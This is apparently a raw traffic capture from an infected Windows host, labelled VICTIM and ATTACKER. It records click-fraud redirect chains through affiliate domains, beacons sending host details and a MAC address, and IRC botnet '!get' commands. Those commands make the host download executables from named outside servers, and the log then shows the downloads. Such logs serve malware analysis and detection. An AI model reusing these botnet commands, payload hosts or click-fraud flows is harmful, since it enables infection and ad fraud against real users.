VICTIM: GET /search/portal.php?ref=175 HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.sellbloom.comConnection: Keep-Alive
ATTACKER: GET /search/index.php?terms=online+affiliate+programs&ref=175 HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http:/www.sellbloom.com/search/portal.php?ref=175Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.sellbloom.comConnection: Keep-Alive
ATTACKER: GET /search/assets/css/base_grass.css HTTP/1.0Accept: */*Referer: http:/www.sellbloom.com/search/index.php?terms=online+affiliate+programs&ref=175Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.sellbloom.comConnection: Keep-Alive
ATTACKER: GET /search/ HTTP/1.0Accept: */*Referer: http:/www.sellbloom.com/search/index.php?terms=online+affiliate+programs&ref=175Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.sellbloom.comConnection: Keep-Alive
VICTIM: \000\000x\343
VICTIM: \000\000({\000\000\000\217192.168.1.248-12_04:01|_8710901.exe_199_06121206x_02_03:54_12_04:01_Pe0.Bta1._Pe0.Bt0..yyy.xxx_Bt06121206a_BtwSvc__so__ConnectedTJ|x|ucsp0416
VICTIM: \000\000x\343
VICTIM: \000\000'\263\000\000\000\0302.0_ucsp0416_svchost.exe
ATTACKER: GET /p0330/2.0/w.bin?134930 HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 64.79.86.26Connection: Keep-Alive
ATTACKER: GET /search/clk.php?u=aHR0cCUzQSUyRiUyRjg0M18xMDIxLmNsaWNrc3ZhbGlkYXRlLmNvbSUyRnJlZGlyZWN0LnBocCUzRmNsY2tfZGF0YSUzRFYwQmNUR05hQ2hNc0ZoeGtVSHRWS2xkVUZoSUNVWHBYYkVZYklnUnNVQThBQlFZRWRGOEhJR3hIYVRzV0lrWjVCMWhRU21OYUNsVjVOMjRTUjNwU2VYSnhjQlZ6VUEwbkNrSVZZekVOSjNvQUFYZGxBbEYlMjUyRlZnMHdhV0JCZXlBSWNnUUxFSE5jZWxOeFJ4OGVPZ1pSZVFJQUJoRjBYWHRVQmdFR0VRa21BVkp4Um1rVk1YaFNlSFYyZHhsM1d3b2dEVVVaWXpZS0lIMEpCUXNVY2w1MlYzczNiaEpFZUZSNmRYWjNFQVVxRFZWNFFCd1ZNUTFTQ0hKeFNVOGpIU3dCS2l0Zk5ocyUyNTJGR2oxQ1FWMTFFajE4Vm5wR0dHRkhmVlo3QmdFR0VXTmFEd3NuR0VRJTI1MkZFR3hSZmdOd1VrY2dBQ0lOS0FCSWRFZDhVUWxCUUZ4R05BZ2pGdyUyNTNEJTI1M0R8MC4wM3x8YWRtaW58fDE3NXww HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http:/www.sellbloom.com/search/index.php?terms=online+affiliate+programs&ref=175Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.sellbloom.comConnection: Keep-Alive
ATTACKER: GET /redirect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3D HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http:/www.sellbloom.com/search/clk.php?u=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-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 843_1021.clicksvalidate.comConnection: Keep-Alive
ATTACKER: GET /js/tools.js?1276344097 HTTP/1.0Accept: */*Referer: http:/843_1021.clicksvalidate.com/redirect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3DAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 843_1021.clicksvalidate.comConnection: Keep-AliveCookie: finditquick=192.168.1.175.1276344097088917
ATTACKER: GET /design/preloading.gif HTTP/1.0Accept: */*Referer: http:/843_1021.clicksvalidate.com/redirect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3DAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 843_1021.clicksvalidate.comConnection: Keep-AliveCookie: finditquick=192.168.1.175.1276344097088917
ATTACKER: GET /conversion.php?JumpToID=94269431941211&Keyword=affiliate_program&Affiliate=843&Pub=94895026 HTTP/1.0Accept: */*Referer: http:/843_1021.clicksvalidate.com/redirect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3DAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.findit-quick.comConnection: Keep-Alive
ATTACKER: GET /conversion.php?JumpToID=94269431941211&Keyword=affiliate_program&Affiliate=843&Pub=94895026 HTTP/1.0Accept: */*Referer: http:/843_1021.clicksvalidate.com/redirect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3DAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.finditquick.comConnection: Keep-Alive
VICTIM: POST /local.php?clck_data=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&pw=390&ph=296&pl=0&pt=0&sx=374&sy=296 HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http:/843_1021.clicksvalidate.com/redi
VICTIM: rect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3DAccept-Language: en-usContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 843_1021.clicksvalidate.comContent-Length: 0Connection: Keep-AlivePragma: no-cacheCookie: finditquick=192.168.1.175.1276344097088917
ATTACKER: GET /?pid=1200&src=843_1021&keywords=affiliate+program HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http:/843_1021.clicksvalidate.com/redirect.php?clck_data=V0BcTGNaChMsFhxkUHtVKldUFhICUXpXbEYbIgRsUA8ABQYEdF8HIGxHaTsWIkZ5B1hQSmNaClV5N24SR3pSeXJxcBVzUA0nCkIVYzENJ3oAAXdlAlF%2FVg0waWBBeyAIcgQLEHNcelNxRx8eOgZReQIABhF0XXtUBgEGEQkmAVJxRmkVMXhSeHV2dxl3WwogDUUZYzYKIH0JBQsUcl52V3s3bhJEeFR6dXZ3EAUqDVV4QBwVMQ1SCHJxSU8jHSwBKitfNhs%2FGj1CQV11Ej18VnpGGGFHfVZ7BgEGEWNaDwsnGEQ%2FEGxRfgNwUkcgACINKABIdEd8UQlBQFxGNAgjFw%3D%3DAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: shop-iw.forless.comConnection: Keep-AlivePragma: no-cache
ATTACKER: PING :j.
ATTACKER: PONG :j.
ATTACKER: GET /IA.jsh?pid=5400.117&subid=forless.com HTTP/1.0Accept: */*Referer: http:/shop-iw.forless.com/?pid=1200&src=843_1021&keywords=affiliate+programAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: js.worthathousandwords.comConnection: Keep-Alive
ATTACKER: GET /tpl/1/text_zilla/images/style.css HTTP/1.0Accept: */*Referer: http:/shop-iw.forless.com/?pid=1200&src=843_1021&keywords=affiliate+programAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: shop-iw.forless.comConnection: Keep-AliveCookie: PHPSESSID=u1a7qkk3ib7skdjhov7or0akp5; cookieID=1276344103.547472.688020.191624
ATTACKER: HTTP/1.0 200 OKContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.0X-AspNet-Version: 2.0.50727X-Powered-By: ASP.NETCache-Control: private, max-age=7200Date: Sat, 12 Jun 2010 12:01:45 GMTContent-Length: 18794Connection: keep-alive
VICTIM: JOIN &virtu
ATTACKER: GET /p6.asp?MAC=00-0C-29-F7-BD-23&Publicer=bigbuy HTTP/1.1Host: in.7cy.netUser-Agent: ClickAdsByIE 0.7.3Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: zh-cn,zh;q=0.5Referer: http:/in.7cy.net/p6.aspContent-Type: application/x-www-form-urlencodedConnection: Close
ATTACKER: NICK bxhhocwuUSER s020500 . . :-
VICTIM: Service Pack 2JOIN &virtu
ATTACKER: :u. PRIVMSG bxhhocwu :!get http:/ad.ghura.pl/dm.exe:u. PRIVMSG bxhhocwu :!get http:/ku.perfectexe.com:88/WINC.exe:u. PRIVMSG bxhhocwu :!get http:/vbmcom.com/read.txt
ATTACKER: GET /dm.exe HTTP/1.0User-Agent: DownloadHost: ad.ghura.plPragma: no-cache
ATTACKER: GET /WINC.exe HTTP/1.0User-Agent: DownloadHost: ku.perfectexe.com:88Pragma: no-cache
ATTACKER: GET /pk/ucsp0416.exe?t=0.8955456 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 64.79.86.26
ATTACKER: GET /w.exe?t=0.8255274 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: ku.perfectexe.com:88
ATTACKER: GET /read.txt HTTP/1.0User-Agent: DownloadHost: vbmcom.comPragma: no-cache
ATTACKER: GET /banner.exe?t=0.9234675 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: sky.perfectexe.com:555
ATTACKER: GET /p6.asp?MAC=00-0C-29-F7-BD-23&Publicer=bigbuy HTTP/1.1Host: in.7cy.netUser-Agent: ClickAdsByIE 0.7.3Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: zh-cn,zh;q=0.5Referer: http:/in.7cy.net/p6.aspContent-Type: application/x-www-form-urlencodedConnection: Close